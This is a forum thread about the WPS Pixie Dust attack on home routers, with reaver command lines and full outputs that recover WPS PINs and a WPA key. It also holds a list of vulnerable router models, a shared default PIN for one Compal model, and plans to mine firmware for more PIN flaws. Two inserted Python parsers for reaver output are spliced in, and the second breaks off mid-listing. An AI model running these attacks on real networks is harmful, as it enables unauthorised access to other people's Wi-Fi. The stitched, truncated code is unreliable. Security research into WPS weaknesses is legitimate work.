
WPS Pixie Dust Attack (Offline WPS Attack)




soxrok2212
2015-04-20, 21:39
I added a new Realtek video demo... "WPS Pixie Dust Attack: Automatic Ralink/Realtek/Broadcom" for those of you having trouble. Can't post youtube videos so you'll just have to search for it.

nuroo
2015-04-20, 21:50
I couldn't find the video yet, even under your name/channel. Probably not finished uploading.

Is the new pixiewps ready, with more Realtek support?

soxrok2212
2015-04-20, 22:02
Not all the Realtek support. It's still under development but the process will be the same. If it doesn't turn up a pin the first time you try it against Realtek, run it again. I had the problem in the video but didn't want to cut it because then people would think it's fake.

Btw, I use pixiewps right from Wiire's github, not from the Kali repos.

nuroo
2015-04-20, 22:05
Nice video !!!

Great work all involved.

soxrok2212
2015-04-20, 22:07

Wiire is literally a genius. He is literally the key to most of the development. Kudos to him, and to all the others who've helped.

mmusket33
2015-04-21, 09:03
Pixie Dust Data Types and successful WPS pin extraction.

There are two (2) types of Pixie Dust data sequences:

When --dh-small is used in the reaver command line the -PKR sequence is fixed and not variable.

When --dh-small is not used the -PKR variable constantly changes.

Musket Teams have come across routers where --dh-small sequences did not provide the WPS key, while the same reaver command line without --dh-small (so that -PKR was variable) provided data that DID extract the WPS key.

MTeams suggest that if you run a --dh-small attack and do not acquire the WPS key from the data, remove --dh-small from the reaver command line, collect some more Pixie Dust data sequences with a variable -PKR and try again.


MTeams Labs

wiire
2015-04-21, 10:42
I just want to point out that the tool is not completed yet; it works only (for Realtek) if the 3 nonces are generated within THE SAME second. So we can't be sure whether --dh-small causes bugs. I think you should try to supply the right pin with Reaver to the AP using --dh-small. If it works and the AP goes past the M3 then it should mean that it works with --dh-small too (unless there's a bug in my code lol).

mmusket33
2015-04-21, 11:29
To wiire


Further PKR corrections when using --dh-small in the reaver command line

Musket Teams noticed that the PKR variable when --dh-small is employed in the reaver command line should normally be a long series of zeros ending with :02. Total string length is 575. However, in all the output provided by the modded reaver, the PKR variable when --dh-small is used shows the 02 at the beginning of the string and the key is never found.

MTeams moved the 02 to the end of the PKR string and the WPS key was immediately found.

In these cases if the key is not found then transpose the 02 to the end of the string when --dh-small is used, OR remove --dh-small from the reaver command line and collect new data with a variable PKR.

Musket Teams Labs

wiire
2015-04-21, 13:49
PKr gets printed in little-endian when using small keys (only). When I added the lines of code to print PKr I didn't test with -S, oops. If you sniff the traffic with Wireshark you see it's OK. BTW if you use pixiewps with small keys (-S) the program will automatically set PKr = 2 (00: ... :02).

That's because with small keys Reaver sets its private number = 1. Thus: g^A mod P = 2^1 mod P = 2 (P is a huge prime number > 2).

Anyway, now the recommended version of Reaver is the one made and maintained by t6_x and datahead (https://github.com/t6x/reaver-wps-fork-t6x) (which prints it right). I updated the link to my original post.
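A small parser for the reaver "[P]" fields that applies the two checks from the posts above (field lengths, and the 00:...:02 small-key PKr that the modded reaver printed byte-reversed). This is an added example, not code from the thread, reaver or pixiewps; the session it parses is constructed, not a real capture.

```python
import re

# Byte lengths of the fields reaver prints with -P (pixie mode). WPS runs
# Diffie-Hellman in a 1536-bit group, so PKe and PKr are 192 bytes each.
FIELD_SIZES = {
    "E-Nonce": 16,
    "PKE": 192,
    "PKR": 192,
    "AuthKey": 32,
    "E-Hash1": 32,
    "E-Hash2": 32,
}
DH_KEY_BYTES = 192

FIELD_RE = re.compile(r"\[P\]\s+(E-Nonce|PKE|PKR|AuthKey|E-Hash1|E-Hash2):\s*(.*)$")


def parse_hex_value(text):
    """Turn 'c6:5a:4c ...' into bytes; stray spaces from copy/paste are dropped."""
    hexstr = re.sub(r"[^0-9a-fA-F]", "", text)
    if len(hexstr) % 2:
        raise ValueError("odd number of hex digits in field")
    return bytes.fromhex(hexstr)


def parse_reaver_block(lines):
    """Collect the '[P] <field>: <hex>' lines of one reaver session into a dict."""
    fields = {}
    for line in lines:
        m = FIELD_RE.match(line.strip())
        if m:
            fields[m.group(1)] = parse_hex_value(m.group(2))
    return fields


def check_sizes(fields):
    """Names of fields whose length does not match the WPS spec (empty = all good)."""
    return [name for name, value in fields.items() if len(value) != FIELD_SIZES[name]]


def colon_hex(data):
    """Format bytes the way reaver prints them: aa:bb:cc..."""
    return ":".join(f"{b:02x}" for b in data)


def small_key_pkr():
    """PKr reaver sends with --dh-small: the private exponent A is 1, so
    g^A mod P = 2^1 mod P = 2 (P is a 1536-bit prime, so no reduction occurs).
    As a 192-byte big-endian number that is 00:00:...:00:02, 575 characters."""
    return (2).to_bytes(DH_KEY_BYTES, "big")


def normalize_small_key_pkr(pkr):
    """The modded reaver discussed above printed PKr little-endian with -S,
    i.e. 02:00:...:00. Return the big-endian form in that case; any other PKr
    is returned unchanged."""
    expected = small_key_pkr()
    if pkr == expected[::-1]:
        return expected
    return pkr


def constructed_sample():
    """Constructed sample session (not real capture data). The PKR line is the
    little-endian small-key form and carries a stray space, as in the thread."""
    pke = bytes(range(192))
    pkr_line = colon_hex(small_key_pkr()[::-1]).replace(":", " :", 1)
    return [
        "[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000",
        "[P] E-Nonce: " + colon_hex(bytes(range(16))),
        "[P] PKE: " + colon_hex(pke),
        "[P] WPS Manufacturer: Example Corp.",
        "[P] PKR: " + pkr_line,
        "[P] AuthKey: " + colon_hex(bytes(32)),
        "[P] E-Hash1: " + colon_hex(bytes([0xAA]) * 32),
        "[P] E-Hash2: " + colon_hex(bytes([0xBB]) * 32),
    ]


if __name__ == "__main__":
    fields = parse_reaver_block(constructed_sample())
    print("fields with wrong size:", check_sizes(fields))
    fixed = normalize_small_key_pkr(fields["PKR"])
    print("PKR byte order corrected:", fixed != fields["PKR"])
    print("PKr tail:", colon_hex(fixed)[-8:], "length:", len(colon_hex(fixed)))
```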

wn722
2015-04-21, 14:48
Uhm, anyone had any luck with Atheros chipsets yet?

soxrok2212
2015-04-21, 14:54
I talked with Dominique, he said Atheros seemed pretty secure. I haven't looked into it much yet to be honest... maybe in the future. We need a lot of data to analyze to see if we find any similar hashes.. etc.

Saydamination
2015-04-21, 16:57
Hi soxrok,

I have some information on a few TP-LINK RTL 8671 EV 2006 07 27 Realtek chipset modems (modem pictures, EAP/EAPOL cap files).

I can send it to you... Maybe you can use it for analysis...

TP-LINK generally uses this chipset...

Send me an email...

Thanks..

soxrok2212
2015-04-21, 17:06
My e-mail is my username @gmail.com :D

someone_else
2015-04-21, 17:59
Some updates for the database ;-)


Compal CH6640E
Realtek RTL8192CE
After a successful PIN test reaver returns "(null)" for PSK + SSID?
So, what else, it's some kind of VULNERABLE ;).




NOT VULNERABLE:

TP-LINK TL-WR740n v1/v2
Broadcom BCM5356




NOT VULNERABLE:

Belkin F7D1301 v1
Broadcom BCM5356A1



NOT VULNERABLE:

ASUS RT-AC66U
Broadcom BCM4706



soxrok2212
2015-04-21, 22:34
Sweet thanks! Just updated everything.. should be all set :D

SubZero5
2015-04-21, 23:45
Not vulnerable:

ZyXEL VMG3312-B10A
[P] WPS Manufacturer: ZyXEL
[P] WPS Model Number: VMG3312-B10A
[P] WPS Model Serial Number: 96368GW



soxrok2212
2015-04-22, 00:24
Awesome thanks

Saydamination
2015-04-22, 10:44
Hi soxrok,

I sent an e-mail ...

good luck :)

someone_else
2015-04-22, 19:56
@ soxrok

Please update the chipset for the Hitron CVE30360. The correct one is RT 3352F :confused:

And a new one for the Database:

NOT VULNERABLE:

TP-LINK TL-WDR3500
Atheros AR9340 / 2.4GHz
Atheros AR9300 / 5GHz



soxrok2212
2015-04-22, 20:19
Whoops... thanks!

aboulatif
2015-04-22, 20:33
Hi soxrok2212, what about the Technicolor TD5130? Is there any method to crack it?

iliass
2015-04-22, 23:02
Your new version works on the TD5130 v2, but not on the TD5130 v1. I will wait for a new video for all Realtek chipsets.

lovemyth
2015-04-23, 12:38
I am not successful with this AP. Do you need me to gather any more information?

http://i301.photobucket.com/albums/nn70/thelovemyth/info.png

DeEqualsDos
2015-04-24, 10:22
Doesn't work on the UK TalkTalk Super Router (Broadcom chipset, Huawei model).

unsuns06
2015-04-24, 15:45
I confirm it's working on Technicolor TD5130 v2... :


wifislax ~ # reaver -i mon0 -b A6:25:89:XX:XX:XX -c 1 -K 3 -P

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Waiting for beacon from A6:25:89:XX:XX:XX
[+] Associated with A6:25:89:XX:XX:XX (ESSID: TNCAPxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[P] E-Nonce: 57:51:75:d2:5f:d2:e1:0e:0b:20:d4:c4:0b:40:34:1a
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2010-09-20
[P] Access Point Serial Number: 123456789012347
[P] PKR: 44:7c:98:9e:94:47:e5:bc:22:0e:4f:b9:19:86:18:3a:35 :e9:70:8c:6d:97:a3:81:53:08:1b:22:4c:4a:fd:0a:2a:a 0:b9:37:de:31:86:2f:63:a1:2c:75:35:10:d9:2b:e3:8f: b7:6b:57:c9:58:fd:e8:0e:bf:87:44:08:23:84:ca:85:ec :2d:53:f3:27:cd:d5:a5:e7:93:9f:3a:7a:66:d3:c4:f1:e b:d4:e9:6c:60:ce:63:12:bc:ac:04:1e:ca:fd:ab:cf:b0: a4:d3:ad:39:f5:bd:1e:b2:c1:93:34:9d:b7:8b:cc:98:c9 :3e:90:d6:08:c0:08:18:51:d3:ff:5f:6a:a5:32:a5:d3:5 f:7d:48:bb:4f:f1:bc:eb:ac:95:22:8f:da:e3:a2:46:b9: 52:3c:ff:95:db:95:a9:0c:28:30:f8:68:97:9a:a7:66:02 :9c:11:da:ab:3d:7d:b7:30:ab:a8:69:c5:07:f5:da:da:e 3:3b:36:7e:f0:97:80:7b:27
[P] AuthKey: 04:b8:0b:ef:4b:f1:12:76:23:39:2d:f6:32:bb:c3:57:15 :45:17:c9:46:e3:a0:3b:44:80:2e:83:16:d8:1e:22
[P] E-Hash1: e6:0e:1b:5f:e2:f1:bc:eb:1e:f7:c4:1d:69:97:3a:ea:3b :81:25:aa:64:4a:23:11:cb:cd:52:8e:c3:78:39:9a
[P] E-Hash2: b9:f4:db:b2:08:1b:31:43:6e:70:9f:ca:cb:4d:bb:5d:0a :fc:86:5b:a4:76:33:e6:e0:cd:1b:b9:05:2f:d1:ce
[Pixie-Dust]
[Pixie-Dust] ES-1: 57:51:75:d2:5f:d2:e1:0e:0b:20:d4:c4:0b:40:34:1a
[Pixie-Dust] ES-2: 57:51:75:d2:5f:d2:e1:0e:0b:20:d4:c4:0b:40:34:1a
[Pixie-Dust] PSK1: 49:40:f7:f2:af:67:5a:50:81:12:b6:27:82:2f:35:3b
[Pixie-Dust] PSK2: d7:c0:5c:8d:60:9a:a6:cc:c0:fe:9e:6c:36:77:04:84
[Pixie-Dust] [+] WPS pin: 99280710
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s
[Pixie-Dust]
Running reaver with the correct pin, wait ...
Cmd : reaver -i mon0 -b A6:25:89:XX:XX:XX -c 1 -s y -p 99280710

[Reaver Test] BSSID: A6:25:89:XX:XX:XX
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '99280710'
[Reaver Test] [+] WPA PSK: '18D189E728'
[Reaver Test] [+] AP SSID: 'TNCAPxxxxxx'

..But not on TD5130 v1 :


wifislax ~ # reaver -i mon0 -b 00:18:E7:XX:XX:XX -c 1 -K 3 -P

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Waiting for beacon from 00:18:E7:XX:XX:XX
[+] Associated with 00:18:E7:XX:XX:XX (ESSID: TNCAPxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[P] E-Nonce: 55:b3:65:81:7c:d3:2a:9b:72:bf:d2:23:58:93:d9:88
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Technicolor
[P] WPS Model Number: Technicolor TD5
[P] Access Point Serial Number: 1209A1D12783
[P] PKR: 2f:97:c1:c5:de:cd:d7:b5:15:ef:8d:bb:e1:53:7c:9f:5c :3d:d2:48:63:a2:d2:ec:1b:88:69:27:44:d2:be:4f:b6:a 6:b8:07:5b:10:8c:a1:a7:01:ea:b7:f0:71:a9:90:31:78: f4:16:8f:4b:6b:0a:89:48:70:18:ad:93:f7:a7:4f:46:37 :ee:50:cb:64:5f:c6:ec:a4:10:5f:ef:a5:90:0c:3b:e3:b 3:50:e9:2a:6b:ea:ce:b4:c4:7f:51:be:ae:59:45:a8:17: a3:8e:9f:6a:05:9e:6f:8b:76:c4:30:9f:bc:c1:b6:76:2b :6d:dd:4e:3b:26:6c:c9:f5:eb:c6:49:eb:9d:a3:ae:64:5 a:f5:87:88:46:ff:30:3e:87:1a:e0:12:89:81:7f:6e:f3: a2:8b:f5:66:47:66:ab:71:0b:1f:4d:de:9f:d9:d7:c4:cc :c5:73:65:93:75:dd:89:ec:43:b0:2e:7e:51:46:1f:79:e e:70:4b:de:26:8a:21:6c:99
[P] AuthKey: f1:63:8a:98:70:5b:6b:9b:fc:e5:f7:69:c9:a8:fd:01:9c :b8:81:e9:c7:07:44:60:98:f1:c1:70:62:d0:65:f4
[P] E-Nonce: 5f:a2:06:2d:1c:01:6b:cc:67:7e:f6:e7:53:df:38:01
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Technicolor
[P] WPS Model Number: Technicolor TD5
[P] Access Point Serial Number: 1209A1D12783
[P] PKR: 1e:4c:22:6d:a7:ce:f8:b7:d0:16:83:76:33:6b:8f:4f:b1 :9e:6c:8a:a6:7d:6a:4a:14:8e:4e:5b:2e:fa:e5:4e:a1:b 2:d0:a0:65:75:16:a6:10:60:27:8d:31:74:4b:e1:4e:0e: 18:2d:f2:ae:10:3f:2f:14:ff:51:75:24:8b:d3:6a:a4:23 :72:7d:d8:bb:63:6b:89:c9:22:0f:32:e3:1b:bb:2b:b6:3 c:8a:b3:4f:c7:a1:4b:fc:d2:4c:73:9c:1d:3f:ae:6d:aa: 3f:f0:a0:84:51:e2:1f:ca:91:f5:89:44:47:48:3c:23:6e :e0:b5:22:f3:c7:9c:db:3f:91:82:78:9f:73:4a:dd:38:0 0:f4:ee:a9:4f:ce:4a:4c:e8:3f:87:9f:e6:3a:a9:07:90: 31:05:09:a7:7d:3f:e6:03:70:44:61:f8:20:cc:47:c3:15 :dd:50:52:54:ee:99:c4:85:7e:8a:64:8f:0f:60:16:3a:e d:3c:8d:d9:17:3e:ca:22:62
[P] AuthKey: f7:94:e0:53:05:c6:92:37:13:8c:d8:04:54:3a:42:5e:5f :8f:4f:28:ae:7a:51:9e:91:3e:69:e8:f6:c8:68:43
[P] E-Hash1: 51:6d:e5:bc:37:d0:ae:bb:de:b8:6d:91:40:b4:55:1a:c0 :15:a1:32:29:1a:c3:66:9f:3e:6f:38:39:3c:ee:95
[P] E-Hash2: c5:e2:df:28:ed:50:8d:69:31:e9:85:9e:1b:68:12:18:cf :c7:1f:f7:f8:41:f4:01:b3:5a:8e:83:a3:24:9e:96
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 1 s

So we're waiting for a new update of Pixie, and I hope it'll be very soon...

Frost.Elrick
2015-04-24, 19:30
pixiewps isn't installing.
It shows a problem at line 46:26.
After that it also halts on the 'SHA1' line.
Any way to solve it...???
I'm running Kali live.

someone_else
2015-04-25, 00:52

@Soxrok2212
Some information about the Compal device. Tested with 8 devices; each of them has the same PIN 47385580, which leads (with friendly help from Bully) to the correct WPA2 key (which was different in all 8 cases). :confused:

soxrok2212
2015-04-25, 01:22
Do me a favor, because this isn't the first time I've seen such a thing. Log into one of them and look under the WPS settings... tell me if a different PIN is also listed there and then try it in reaver/bully :) Please :)

someone_else
2015-04-25, 12:23
Hi,
Checked three of them; each one has 47385580 as the default PIN in the WPS settings.
For 7 models Reaver gives PSK + SSID "(null)"; only one shows SSID and PSK. Bully delivers both values correctly.
Btw: in your Pixie database a second Compal device is listed (CBN-106-145-065). That CBN-xxx-xxx-xxx number is different on each router I've tested, so it's probably the same model.

Here are 5 of them:


[P] AuthKey: 44:65:47:ff:b9:02:fe:58:58:16:54:30:15:a5:10:c1:50 :1c:04:3c:d6:d2:07:a5:73:54:93:a8:0b:4b:3b:90
[P] E-Hash1: 3a:4b:c9:1c:51:f9:6a:c5:26:3c:ba:41:2d:06:c9:62:85 :4a:5f:6a:16:17:a5:40:9a:6e:b6:13:1b:48:01:28
[P] E-Hash2: db:00:8d:a9:86:2f:14:12:4a:ee:23:e3:50:8b:1a:d3:c4 :da:39:09:d8:55:07:7d:53:a3:3f:19:3e:ce:65:1c


[P] E-Nonce: 3c:d0:62:c2:3b:83:41:84:5a:bc:d5:92:40:b4:ac:45
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: 8b:19:f7:8c:50:67:a3:b9:ec:61:ba:b1:a6:e5:6b:94:37 :89:46:b3:3c:68:62:16:57:bc:f6:00:fe:20:a6:63:82:6 5:f5:ac:c0:29:96:89:d0:03:8d:ed:06:b2:f7:28:00:5d: 6b:fc:76:d0:f6:1c:53:a4:17:46:9b:f9:64:69:bd:a4:0e :bd:b7:32:fc:a7:7c:cc:2f:dc:2e:73:45:71:b7:46:82:4 d:ec:ab:5e:d9:04:1d:a6:a0:12:63:5e:a8:da:ee:2f:15: d7:6b:9e:23:51:2b:bd:f3:a0:4d:53:55:b0:8b:a8:8f:e5 :ec:cd:8b:c6:b3:7f:a0:8d:9a:4d:ea:7b:b9:5c:a2:0b:c d:f7:b7:4c:ad:c8:0c:b6:c4:21:c2:4e:91:b9:19:13:65: 1c:9a:bb:0e:b5:f7:3f:92:eb:c3:4b:21:11:47:31:2a:46 :06:2f:4e:9a:0d:2a:0c:37:67:17:a8:0f:06:b2:1f:19:c 6:f7:25:7f:c1:c0:16:0f:48
[P] AuthKey: 0c:a1:7a:6a:da:34:42:18:96:8d:dd:8d:61:98:05:a2:ac :6f:15:4f:2c:8b:70:d3:54:2f:c2:32:06:db:52:96
[P] E-Hash1: 29:c1:bb:a1:23:c4:69:fa:0d:56:46:98:61:51:c0:8f:60 :fb:fd:5f:0f:d1:d0:1a:df:56:d1:d5:12:e7:71:5d
[P] E-Hash2: 62:0b:ad:55:b2:3d:1d:b8:bf:e4:39:27:59:1d:43:47:12 :3f:82:22:66:32:87:7a:a8:ec:c2:52:0b:13:f2:b6

soxrok2212
2015-04-25, 14:09
Alright thanks... there was no other pin listed?

Saydamination
2015-04-25, 14:14

Now, I have some information about the F8:1A:67:XX:XX:XX MAC address (RTL8671 EV 2006 07 27 chipset of TP-LINK modems).

These MAC addresses are masked... F8:1A:67 is the mask, FA:1A:67 the original MAC.

someone_else
2015-04-25, 16:13
Alright thanks... there was no other pin listed?

Nope. Don't know if this is ISP/country specific, but (again) all tested routers have the same PIN.

Here (http://www.ktech.no/CG6640E_User_Guide_English.pdf) is the user manual; the WPS menu is described on page 50.

wn722
2015-04-26, 06:51
If it's any use for anyone:

TP-LINK TL-WR841ND v8.x
WI1 chip1: Atheros AR9341



[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 8.0
[P] WPS Model Serial Number: 1.0
[+] Received M1 message
[+] Sending M2 message
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 1 s

wn722
2015-04-26, 08:36
Zyxel Keenetic vulnerable
unknown chipset



[P] WPS Manufacturer: ZyXEL Communications Corp.
[P] WPS Model Number: KEENETIC series
[P] WPS Model Serial Number: none
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[Pixie-Dust]
[Pixie-Dust] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] PSK1: 7a:a9:99:5e:00:60:98:fd:91:37:2c:e9:f4:1c:67:11
[Pixie-Dust] PSK2: ce:81:5a:1b:39:ce:c3:07:86:59:21:71:0c:f4:a6:31
[Pixie-Dust] [+] WPS pin: 19048185

someone_else
2015-04-26, 09:18
Sorry for the off-topic, I've got further information about Compal:

MAC address 5C:35:3B:xx:xx:xx
cbn–zyy–xxx-xxx
Serial number: NNNNNxxxxxxxxx
In my 8 cases, "N" is 53059. (Convert this number (with leading zero) to hex and you get 353B, part of the MAC address.)
The other 9 digits "x" are the last 6 characters of the MAC address in decimal.
And cbn should be something like "Compal Broadband Network".

Later last day I've got two Compal models with MAC address (DC:53:7C); each of them has a different PIN:



AND HERE:



/\/\

NOT VULNERABLE:

Linksys WRT120n
Atheros AR9285



NOT VULNERABLE:

D-Link 615 B2
Atheros AR5416/Atheros AR2122



nuroo
2015-04-26, 13:18
1. Which is the best tool for automated hash collection. Something we could use to gather hashes to send off for analysis, possibly find new holes for pixiewps.

2. Are hashes from locked routers corrupt, no good for analysis?

3. Also any update on Realtek attack?

kcdtv
2015-04-26, 13:46
1.
The best way is simply to save a *.cap file with the PROBES and M messages and to add a *.txt file with the output of modified reaver.
In case the chipset and/or the model/manufacturer doesn't appear fully/directly in the probes/stdout of modified reaver, please add this information manually.

2.
They are not corrupted, but you need to get M1, M2 and M3, and you will not get this full sequence on a locked router (until it is unlocked again).

3.
Do you know how to "disassemble" firmware? I am stuck and need some help; I found something very interesting on unsupported Realtek, in parts that can be disassembled easily with binwalk from Craig Heffner.
Basically there is a little *.sh script on startup that generates 4 things (or checks if these four things have been generated correctly and generates them if that is not the case), and one of them is the default WPS PIN.
On these devices the PIN is permanent/unconfigurable: http://pix.toile-libre.org/upload/original/1430055858.png
Help would be appreciated.

nuroo
2015-04-26, 15:02
The best way is simply to save a *.cap file with the PROBES and M messages

Gonna take a look at Wireshark, try and figure it out.
kcdtv, appreciate the responses, very interesting.

Hope someone is developing a tool to automate the process, for noobs. If made easy for noobs like me, we can help build the data collection pool.

someone_else
2015-04-26, 15:10
I use a modified reaver-src. If I set the -o $logfile switch, reaver writes only the pixie data to the logfile:

For AuthKey make the following changes:

change :

wps_common.c: printf("[P] AuthKey: ");
to :

wps_common.c: cprintf(VERBOSE, "[P] AuthKey: ");
and add a new line in wps_common.c (under #include "wps_dev_attr.h") with:

#include "../misc.h"

And for Messages, you don't need (Here the M1 received Msg):
replace:

exchange.c: cprintf(VERBOSE, "[+] Received M1 message\n");
with:

exchange.c: printf("[+] Received M1 message\n");

I'll search with grep for all reaver messages and change everything which is not important for the output file.
Not the perfect way, but it works ;)
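A collector for the data these posts are talking about (kcdtv's .cap-plus-stdout bundle, the -o logfile above), as an added example that is not part of the thread, reaver or autopixiewps: it parses reaver's [P] lines into one record per M1..M3 exchange, strips the spaces a forum inserts when it wraps the long PKE/PKR hex, checks each field's byte length and flags exchanges that never reached M3 (the locked-router case). The field names follow reaver's output; the sample log and the ExampleCorp values are constructed placeholders.

```python
"""Collect the '[P]' Pixie-Dust fields from reaver output into per-exchange records."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Byte lengths of the binary fields in a WPS registration exchange:
# 1536-bit DH public keys, 128-bit nonces, 256-bit HMAC-SHA256 values.
FIELD_LEN = {"E-Nonce": 16, "R-Nonce": 16, "PKE": 192, "PKR": 192,
             "AuthKey": 32, "E-Hash1": 32, "E-Hash2": 32}
TEXT_FIELDS = ("WPS Manufacturer", "WPS Model Number",
               "WPS Model Serial Number", "Access Point Serial Number")
NEEDED = ("E-Nonce", "PKE", "PKR", "AuthKey", "E-Hash1", "E-Hash2")

P_LINE = re.compile(r"^\[P\]\s+([A-Za-z0-9 -]+?):\s*(.*)$")
PIN_LINE = re.compile(r"^\[Pixie-Dust\].*WPS pin:\s*(\d{8})")


def clean_hex(raw: str) -> str:
    """Drop colons and any whitespace (forum line wrapping), validate as hex."""
    h = re.sub(r"[:\s]", "", raw).lower()
    if len(h) % 2 or not re.fullmatch(r"[0-9a-f]*", h):
        raise ValueError(f"not a hex string: {raw[:32]!r}")
    return h


@dataclass
class Exchange:
    """One M1..M3 exchange: the values pixiewps consumes plus the AP's self-description."""
    values: Dict[str, str] = field(default_factory=dict)
    pin: Optional[str] = None
    errors: List[str] = field(default_factory=list)

    def complete(self) -> bool:
        """True only when M1, M2 and M3 all arrived intact (a locked AP stops before M3)."""
        return all(k in self.values for k in NEEDED) and not self.errors


def parse_reaver_log(text: str) -> List[Exchange]:
    exchanges: List[Exchange] = []
    cur: Optional[Exchange] = None
    for line in text.splitlines():
        line = line.strip()
        m = P_LINE.match(line)
        if m:
            name, val = m.group(1).strip(), m.group(2).strip()
            if name == "E-Nonce":          # first field of M1: a new exchange begins
                cur = Exchange()
                exchanges.append(cur)
            if cur is None:
                continue
            if name in TEXT_FIELDS:
                cur.values[name] = val
            elif name in FIELD_LEN:
                try:
                    h = clean_hex(val)
                except ValueError as exc:
                    cur.errors.append(str(exc))
                    continue
                if len(h) != 2 * FIELD_LEN[name]:
                    cur.errors.append(f"{name}: {len(h) // 2} bytes, expected {FIELD_LEN[name]}")
                cur.values[name] = h
            continue
        m = PIN_LINE.match(line)
        if m and cur is not None:
            cur.pin = m.group(1)
    return exchanges


# --- constructed sample input (placeholder bytes, not real WPS data) ---------
def fake_bytes(n: int, seed: int) -> bytes:
    return bytes((seed * 7 + i) % 256 for i in range(n))


def reaver_style(b: bytes, wrap: int = 50) -> str:
    """Colon-separated hex, with a space every `wrap` chars the way a forum wraps it."""
    s = ":".join(f"{x:02x}" for x in b)
    return " ".join(s[i:i + wrap] for i in range(0, len(s), wrap))


SAMPLE_LOG = "\n".join([
    "[+] Trying pin 12345670.",
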